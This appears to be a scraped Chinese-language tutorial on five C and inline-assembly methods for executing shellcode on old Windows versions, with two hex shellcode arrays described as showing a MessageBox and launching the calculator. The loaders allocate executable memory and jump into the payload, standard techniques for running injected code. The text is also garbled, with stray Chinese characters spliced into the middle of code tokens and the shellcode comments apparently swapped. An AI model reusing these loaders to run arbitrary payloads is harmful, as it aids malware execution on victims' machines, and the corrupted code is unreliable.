1、下面介绍一下使用C语言执行ShellCode的五种方法,但是这种方法只限于在Windows XP和Windows 2003操作系统之下。
2、下面给出两段可用的ShellCode代码,分别是弹出MessageBox和打开calc计算器的ShellCode代码,演示代码如下所示:
3、#include "stdafx.h"#include <Windows.h>稆糨孝汶;typedef void (_stdcall *CODE)();#define Calc_Test#ifdef Calc_Test//一段弹出MessageBox的shellcodeunsigned char shellcode[] = "\xb8\x82\x0a\x8d\x38\xd9\xc6\xd9\x74\x24\xf4\x5a\x29\xc9\xb1\x23" "\x31\x42\x12\x83\xea\xfc\x03\xc0\x04\x6f\xcd\x38\xf0\x2b\x2e\xc0" "\x01\x3f\x6b\xfc\x8a\x43\x71\x84\x8d\x54\xf2\x3b\x96\x21\x5a\xe3" "\xa7\xde\x2c\x68\x93\xab\xae\x80\xed\x6b\x29\xf0\x8a\xac\x3e\x0f" "\x52\xe6\xb2\x0e\x96\x1c\x38\x2b\x42\xc7\xc5\x3e\x8f\x8c\x99\xe4" "\x4e\x78\x43\x6f\x5c\x35\x07\x30\x41\xc8\xfc\x45\x65\x41\x03\xb2" "\x1f\x09\x20\x40\xe3\x83\xe8\x2c\x68\xa3\xd8\x29\xae\x5c\x15\xba" "\x6f\x91\xae\xcc\x73\x04\x3b\x44\x84\xbd\x35\x1f\x14\xf1\x46\x1f" "\x15\x79\x2e\x23\x4a\x4c\x59\x3b\x22\x27\x5d\x38\x0a\x4c\xce\x56" "\xf5\x6b\x0c\xd5\x61\x14\x2f\x93\x7c\x73\x2f\x44\xe3\x1a\xa3\xe9" "\xe4";#endif#ifdef MessageBox_Test//一段打开Windows计算器的shellcodeunsigned char shellcode[] = "\xEB\x42\x8B\x59\x3C\x8B\x5C\x0B\x78\x03\xD9\x8B\x73\x20\x03\xF1" "\x33\xFF\x4F\x47\xAD\x33\xED\x0F\xB6\x14\x01\x38\xF2\x74\x08\xC1" "\xCD\x03\x03\xEA\x40\xEB\xF0\x3B\x6C\x24\x04\x75\xE6\x8B\x73\x24" "\x03\xF1\x66\x8B\x3C\x7E\x8B\x73\x1C\x03\xF1\x8B\x04\xBE\x03\xC1" "\x5B\x5F\x53\xC3\xEB\x4F\x33\xC0\x64\x33\x40\x30\x8B\x40\x0C\x8B" "\x70\x1C\xAD\x8B\x48\x08\x58\x33\xDB\x33\xFF\x66\xBF\x33\x32\x57" "\x68\x75\x73\x65\x72\x8B\xFC\x53\x51\x53\x50\x50\x53\x57\x68\x54" "\x12\x81\x20\xE8\x8A\xFF\xFF\xFF\xFF\xD0\x8B\xC8\x68\x25\x59\x3A" "\xE4\xE8\x7C\xFF\xFF\xFF\xFF\xD0\x59\x68\x97\x19\x6C\x2D\xE8\x6F" "\xFF\xFF\xFF\xFF\xD0\xE8\xAC\xFF\xFF\xFF" "hello,world!";#endif//函数声明void RunShellCode_1();void RunShellCode_2();void RunShellCode_3();void RunShellCode_4();void RunShellCode_5();int _tmain(int argc, _TCHAR* argv[]){ RunShellCode_1(); return 0;}
4、//第一种方法void RunShellCode_1(){ PVOID p = NULL; if猾诮沓靥((p = VirtualAlloc(NULL,sizeof(shellcode)荑樊综鲶,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)) == NULL) MessageBox(NULL,"VirtuallAlloc Failed!!!","Prompt",MB_OK); if(!(memcpy(p,shellcode,sizeof(shellcode)))) MessageBox(NULL,"WriteMemory Failed!!!","Prompt",MB_OK); CODE code = (CODE)p; code();}
5、//第二种方法void RunShellCode_2(){ ((void (*)(void))&shellcode)();}
6、//第三种方法void RunShellCode_3(){ __asm { lea eax,shellcode; jmp eax; }}
7、//第四种方法void RunShellCode_4(){ __asm { mov eax,offset shellcode; jmp eax; }}
8、//第五种方法void RunShellCode_5(){ __asm { mov eax,of酆璁冻嘌fset shellcode; _emit 0xFF; _emit 0xE0; }}
